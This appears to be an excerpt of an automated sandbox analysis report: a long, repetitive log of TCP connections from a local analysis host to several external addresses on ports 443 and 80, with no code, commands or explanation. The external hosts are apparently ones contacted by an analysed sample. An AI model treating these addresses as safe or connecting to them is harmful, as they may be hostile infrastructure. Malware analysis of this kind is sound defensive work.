                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 5.159.62.244:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 5.159.62.243:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
